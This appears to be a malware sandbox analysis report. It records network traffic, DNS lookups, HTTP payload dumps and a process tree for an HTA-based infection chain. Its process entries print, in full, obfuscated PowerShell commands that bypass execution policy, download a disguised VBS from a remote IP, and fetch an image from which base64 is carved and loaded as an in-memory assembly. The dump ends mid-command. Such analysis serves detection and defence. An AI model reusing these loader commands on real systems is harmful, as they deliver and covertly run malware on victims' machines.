Oct 14, 2024 10:55:06.894500017 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894525051 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894546032 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894593954 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894629002 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894640923 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894640923 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894640923 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894640923 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894679070 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894723892 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894756079 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894788980 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894818068 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894818068 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894818068 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894818068 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894820929 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894845009 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894854069 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.894938946 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.894938946 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.895066023 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.895097971 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.895132065 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:06.895172119 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.895172119 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:06.895199060 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:11.531408072 CEST	80	49704	192.3.220.40	192.168.2.5
Oct 14, 2024 10:55:11.531698942 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:11.947957993 CEST	49705	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:55:11.948003054 CEST	443	49705	207.241.227.242	192.168.2.5
Oct 14, 2024 10:55:11.948080063 CEST	49705	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:55:11.956618071 CEST	49705	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:55:11.956645966 CEST	443	49705	207.241.227.242	192.168.2.5
Oct 14, 2024 10:55:12.489511013 CEST	49704	80	192.168.2.5	192.3.220.40
Oct 14, 2024 10:55:54.720271111 CEST	443	49705	207.241.227.242	192.168.2.5
Oct 14, 2024 10:55:54.720362902 CEST	49705	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:55:54.736679077 CEST	49705	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:55:54.736743927 CEST	443	49705	207.241.227.242	192.168.2.5
Oct 14, 2024 10:55:54.894603014 CEST	57947	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:55:54.894654989 CEST	443	57947	207.241.227.242	192.168.2.5
Oct 14, 2024 10:55:54.894748926 CEST	57947	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:55:54.895181894 CEST	57947	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:55:54.895196915 CEST	443	57947	207.241.227.242	192.168.2.5
Oct 14, 2024 10:56:37.669496059 CEST	443	57947	207.241.227.242	192.168.2.5
Oct 14, 2024 10:56:37.669684887 CEST	57947	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:56:37.671355009 CEST	57947	443	192.168.2.5	207.241.227.242
Oct 14, 2024 10:56:37.671379089 CEST	443	57947	207.241.227.242	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 10:55:11.588408947 CEST	64409	53	192.168.2.5	1.1.1.1
Oct 14, 2024 10:55:11.942758083 CEST	53	64409	1.1.1.1	192.168.2.5
Oct 14, 2024 10:55:32.566461086 CEST	53	55875	162.159.36.2	192.168.2.5
Oct 14, 2024 10:55:33.067569017 CEST	49610	53	192.168.2.5	1.1.1.1
Oct 14, 2024 10:55:33.076302052 CEST	53	49610	1.1.1.1	192.168.2.5
Oct 14, 2024 10:55:34.349879980 CEST	64490	53	192.168.2.5	1.1.1.1
Oct 14, 2024 10:55:34.357158899 CEST	53	64490	1.1.1.1	192.168.2.5
Oct 14, 2024 10:55:54.738275051 CEST	56129	53	192.168.2.5	1.1.1.1
Oct 14, 2024 10:55:54.893393993 CEST	53	56129	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 10:55:11.588408947 CEST	192.168.2.5	1.1.1.1	0xf580	Standard query (0)	ia600102.us.archive.org	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:55:33.067569017 CEST	192.168.2.5	1.1.1.1	0xdea0	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 14, 2024 10:55:34.349879980 CEST	192.168.2.5	1.1.1.1	0x6897	Standard query (0)	50.23.12.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 14, 2024 10:55:54.738275051 CEST	192.168.2.5	1.1.1.1	0xa3d8	Standard query (0)	ia600102.us.archive.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 10:55:11.942758083 CEST	1.1.1.1	192.168.2.5	0xf580	No error (0)	ia600102.us.archive.org		207.241.227.242	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:55:33.076302052 CEST	1.1.1.1	192.168.2.5	0xdea0	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Oct 14, 2024 10:55:34.357158899 CEST	1.1.1.1	192.168.2.5	0x6897	Name error (3)	50.23.12.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Oct 14, 2024 10:55:54.893393993 CEST	1.1.1.1	192.168.2.5	0xa3d8	No error (0)	ia600102.us.archive.org		207.241.227.242	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

192.3.220.40

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	192.3.220.40	80	6720	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:55:06.017443895 CEST	308	OUT	GET /330/verybestthingswesharedfornew.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 192.3.220.40 Connection: Keep-Alive
Oct 14, 2024 10:55:06.522108078 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 08:55:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 08 Oct 2024 07:17:57 GMT ETag: "2fbe8-623f1efc6828c" Accept-Ranges: bytes Content-Length: 195560 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 70 00 6c 00 61 00 74 00 69 00 72 00 72 00 6f 00 73 00 74 00 72 00 6f 00 28 00 61 00 72 00 67 00 69 00 6c 00 6c 00 69 00 74 00 61 00 2c 00 20 00 73 00 6f 00 63 00 72 00 61 00 74 00 69 00 63 00 61 00 6d 00 65 00 6e 00 74 00 65 00 2c 00 20 00 65 00 73 00 66 00 65 00 6e 00 6f 00 69 00 64 00 65 00 2c 00 20 00 67 00 61 00 6c 00 6c 00 69 00 6e 00 68 00 65 00 69 00 72 00 61 00 2c 00 20 00 61 00 6c 00 61 00 62 00 61 00 72 00 64 00 69 00 6e 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 [TRUNCATED] Data Ascii: private function platirrostro(argillita, socraticamente, esfenoide, gallinheira, alabardino) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if esfenoide.ArgumentExists(NPARA_FILTER) then filter = esfenoide.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if esfenoide.ArgumentExists(NPARA_DIALECT) then dialect = esfenoide.Argume
Oct 14, 2024 10:55:06.522166014 CEST	1236	IN	Data Raw: 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 44 00 49 00 41 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 Data Ascii: nt(NPARA_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/
Oct 14, 2024 10:55:06.522216082 CEST	448	IN	Data Raw: 00 69 00 6c 00 74 00 65 00 72 00 20 00 3d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 20 00 4e 00 61 00 6d 00 65 00 3d 00 27 00 22 Data Ascii: ilter = filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next
Oct 14, 2024 10:55:06.522267103 CEST	1236	IN	Data Raw: 00 69 00 61 00 6c 00 65 00 63 00 74 00 20 00 3d 00 20 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 73 00 63 00 68 00 65 00 6d 00 61 00 73 00 2e 00 6d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 63 00 6f 00 6d 00 2f 00 77 00 62 Data Ascii: ialect = "http://schemas.microsoft.com/wbem/wsman/1/WQL" End If If LCase(dialect) = "association" Then
Oct 14, 2024 10:55:06.522300959 CEST	1236	IN	Data Raw: 00 69 00 6f 00 6e 00 49 00 6e 00 73 00 74 00 61 00 6e 00 63 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 45 00 6c 00 73 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c Data Ascii: ionInstance Else flags = flags OR argillita.EnumerationFlagAssociatedInstance End if
Oct 14, 2024 10:55:06.522331953 CEST	1236	IN	Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 4f 00 52 00 20 00 61 00 72 00 67 00 69 00 6c 00 6c 00 69 00 74 00 61 00 2e 00 45 00 6e 00 75 00 6d 00 65 00 72 Data Ascii: flags = flags OR argillita.EnumerationFlagReturnEPR case VAL_RT_OBJ_EPR flags = fla
Oct 14, 2024 10:55:06.522382021 CEST	1236	IN	Data Raw: 00 68 00 79 00 44 00 65 00 65 00 70 00 42 00 61 00 73 00 65 00 50 00 72 00 6f 00 70 00 73 00 4f 00 6e 00 6c 00 79 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6c 00 73 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c Data Ascii: hyDeepBasePropsOnly else flags = flags OR argillita.EnumerationFlagHierarchyDeep end if on erro
Oct 14, 2024 10:55:06.522413969 CEST	1236	IN	Data Raw: 00 66 00 65 00 6e 00 6f 00 69 00 64 00 65 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 54 00 49 00 4d 00 45 00 4f 00 55 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 Data Ascii: fenoide.Argument(NPARA_TIMEOUT) end if if(LCase(alabardino) <> VAL_FORMAT_TEXT) then wscript.echo "<
Oct 14, 2024 10:55:06.522447109 CEST	1236	IN	Data Raw: 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 45 00 52 00 52 00 20 00 65 00 2c 00 20 00 61 00 6c 00 61 00 62 00 61 00 72 00 64 00 69 00 6e 00 6f 00 0d 00 0a 00 20 00 20 00 20 Data Ascii: if ASSERTERR e, alabardino on error goto 0 'reformat if requested on error
Oct 14, 2024 10:55:06.522480011 CEST	1236	IN	Data Raw: 00 20 00 3d 00 20 00 22 00 47 00 7a 00 68 00 4e 00 70 00 4c 00 55 00 6b 00 55 00 49 00 6a 00 51 00 72 00 57 00 4c 00 22 00 0d 00 0a 00 69 00 64 00 62 00 47 00 74 00 55 00 4b 00 4c 00 68 00 4c 00 70 00 69 00 75 00 66 00 70 00 20 00 3d 00 20 00 22 Data Ascii: = "GzhNpLUkUIjQrWL"idbGtUKLhLpiufp = "ccoLqZvAZpKLWNH"OrmbWJsGdiLWkxs = "LKZWLhHtcWkNcUn"AfUKULBqiKiALcx = "ptLBSp
Oct 14, 2024 10:55:06.527334929 CEST	1236	IN	Data Raw: 00 62 00 42 00 47 00 4c 00 57 00 74 00 63 00 70 00 74 00 57 00 47 00 6d 00 4e 00 64 00 67 00 22 00 0d 00 0a 00 0d 00 0a 00 6f 00 61 00 6f 00 4c 00 74 00 7a 00 4b 00 69 00 65 00 57 00 68 00 55 00 78 00 75 00 43 00 20 00 3d 00 20 00 22 00 6b 00 53 Data Ascii: bBGLWtcptWGmNdg"oaoLtzKieWhUxuC = "kSzZICkPZuWWdzP"LAWbiqoxoPzPRdq = "zPLJrUkmkLlifWc"mZPLbJWKLchWzWk = "dWiKOLkz

Target ID:	0
Start time:	04:54:56
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\na.hta"
Imagebase:	0x2b0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:54:57
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:54:57
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:54:57
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Imagebase:	0x20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:54:59
Start date:	14/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline"
Imagebase:	0x6c0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:55:04
Start date:	14/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES15CB.tmp" "c:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP"
Imagebase:	0xe10000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:55:09
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
Imagebase:	0xa70000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:55:09
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:55:09
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:55:09
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = 